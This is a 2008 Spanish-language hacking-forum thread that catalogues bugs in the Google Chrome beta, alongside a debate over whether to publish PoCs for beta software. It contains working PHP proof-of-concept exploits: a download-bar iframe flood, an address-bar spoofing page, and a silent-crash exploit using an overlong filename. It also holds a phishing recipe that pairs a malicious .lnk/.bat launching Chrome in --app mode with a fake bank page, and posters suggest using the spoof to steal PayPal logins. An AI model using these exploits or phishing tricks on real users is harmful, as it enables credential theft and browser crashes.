[°] Recopilatorio de Bugs/Exploits en Google Chrome win32

Iniciado por WHK, 3 Septiembre 2008, 00:45 AM

0 Miembros y 2 Visitantes están viendo este tema.

Eazy

La 'Etica' dice que no se sacan advisories ni poc de programas beta.
[/url]

WHK

Y mi ética dice que mientras mas fallas puedas reportar es mejor para el desarrollador ya que esto ayuda a fortalecer el mismo software asi como se ha hecho con firefox desde un comienzo.

Lo mejor que pudieron haber hecho es liberar su código , no tan solo para desarrollar sino para sanar bugs que podrían comprometer la integridad de todos sus usuarios finales por mas que sea beta o no.

WHK

#12
Lo mas entretenido es que en el soporte de google nadie habla ingles XD
http://code.google.com/p/chromium/issues/detail?id=213

me dicen: "los técnicos solo hablan inglés" y nadie sabe que hablo  :xD entonces supongo que el software fue hecho solamente para los de habla inglesa joder!

hay que explicarles con dibujos y manzanas...


Bueno, sin ir mas ayá solo me molesta que no hablen español pero en cuanto al explorador en si espero que quede bién muy pronto como para salir de la etapa beta y poder utilizarlo con toda normalidad.

Código (php) [Seleccionar]
<?php
 error_reporting
(0);
 echo 
"Iniciando prueba del concepto por WHK probando una 
          inundaci&oacute;n de mensajes en la bandeja de avisos sin la 
          posibilidad de eliminar completamente la barra perdiendo 
          links y aumentando el uso de recursos desmedidos.<br>\n"
;
 for(
$Cuenta=0;$Cuenta<900;$Cuenta++){
  echo 
'<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" width="0" height="0" frameborder="0"></iframe>'."\n";
 }
?>


Además tiene la misma falla que firefox cuando modificas la barra del explorador y cuando haces click en el espacio de trabajo sin dar enter no buelve a su estado original... por ejemplo entra a https://evil.domain/getdata.php y después ve a tu web preparada para alojar los datos de la victima https://www.paypal.com/ sin dar enter y haciendo click en cualquier parte del formulario, si dejas el explorador en ese estado cualquier persona que intente acceder a su cuenta la estará regalando (IE7 no es vulnerable pero si ayer encontré una falla donde ingresas carácteres nulos en javascript: y la url se mantiene intacta de igual forma).

WHK

#13
Código (html4strict) [Seleccionar]
vbscript:alert("XSS");
El explorador no interpreta visual basic scripts.

Código (html4strict) [Seleccionar]
mms://web.com/radio/
No soporta videos online con windows media video

Código (html4strict) [Seleccionar]
<?php
 
echo "Prueba del concepto para probar la vulnerabilidad de Google Chrome
 al no reestablecer su barra de navegaci&oacute;n al ser modificada sin ser 
 establecido como url final.<br>
 \$_SERVER[HTTP_HOST] = <b>
$_SERVER[HTTP_HOST]</b>"
?>

http://www.jccharry.com/pruebas/Google%20Chrome/1.php

Lo visualizas y después escribes arriba "https://www.paypal.com" y son presionar enter posicionas el mouse sobre el navegador.
Un atacante podría utilizarlo para robar cuentas remotamente, inclusive desde un ciber... dejas la página inicial de msn con un fake que capture contraseñas.



Esta falla podría ser aprobechado para un phishing facilmente.

Nota: Internet Explorer no presenta ese bug.



Citarchrome-resource://new-tab/%%
En esta URL el explorador queda cargando infinitamente.

Citarchrome-resource://thumb/fake
Acá el contenido no es declarado como imagen (Falta la cabezera del header!)



Como se imprime en texto plano, que pasaría si una imagen contiene cntenido HTML?, talves ahora no se sepa como pero con "chrome-resource" talves pueda apuntar a un archivo descargado automáticamente en formato imagen y cargarlo de la misma forma para su ejecución.
PD: Google le hace publicidad a "Adobe ImageReady"  :o



Claro...


Ovbiamente es rápido porque trabaja con multiprocesos pero eso significa utilizar casi la mitad de tus recursos queriendo decir "o navegas o usas photoshop porque acá no podrás caminar y masticar chicle al mismo tiempo"



Citarchrome-resource://inspector
Ejalee!!!!
CitarEsta página web tiene un bucle de redireccionamiento.

La página web de chrome-resource://inspector////////////////////// ha provocado demasiados redireccionamientos. Es posible que se solucione el problema si borras las cookies. Si no es así, tal vez se deba a una configuración del servidor y no a un problema con tu equipo.

A continuación se detallan algunas sugerencias:
Carga esta página web de nuevo más tarde.
  Más información sobre este error
Como decia antes, talves puedas tener acceso a la carga de archivos externos al sistema.



No se si alguien me está tirando alguna maldición  :¬¬ pero el explorer no me deja visualizar lo que hay dentro de
CitarC:\Documents and Settings\Yan\Configuración local\Datos de programa\Google\Chrome\Application\0.2.149.27\Resources\Inspector\Images


hkm

La funcion de acceso directo a aplicaciones aparte de no mostrar en que servidor estas, tampoco muestra el estado del SSL. Esta es una invitacion a portales falsos.

Un atacante (phisher) podria abusar de usuarios novatos que por ingenieria social abran un archivo malicioso (.bat o .lnk) que contenga una linea similar a:
%homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicioso.net/pagina-bancaria-falsa.html


hkm

sirdarckcat

Cita de: Eazy en  3 Septiembre 2008, 22:04 PM
La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Al contrario, se sacan para que los arreglen antes de que sea una versión estable :¬¬.. lo que sí es "mas" ético es no publicar las cosas hasta que las arreglen, pero no siempre se puede.

WHK, me hubieras dicho y te ayudaba con la traducción :xD.

Saludos!!

PD. Un gusto verlo por aqui hakim

APOKLIPTICO

Ey! probablemente estes en la pista de un zero day... XD
Este google chrome esta demasiado beta como para que lo use nadie...
Un abrazo
APOKLIPTICO
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

WHK

CitarEste google chrome esta demasiado beta como para que lo use nadie...
Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.

WHK

#18
encontré un bug un poco mas elegante  :P se trata de que cuando vizualizas una web este se cierra sin decirle nada  a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya.

http://www.jccharry.com/pruebas/Google%20Chrome/2.php

:xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit:

Código (php) [Seleccionar]
<?php

/*
Google Chrome 0.2.149.27 (1583) Silent Crash PoC
WHK - elhacker.net 
*/

$nombre 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
$contenido 'prueba';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$nombre");
print(
$contenido);

/* 
http://www.jccharry.com/pruebas/Google%20Chrome/2.php
http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
http://milw0rm.com/exploits/6365
*/

?>

No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar  :-*

berz3k


@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.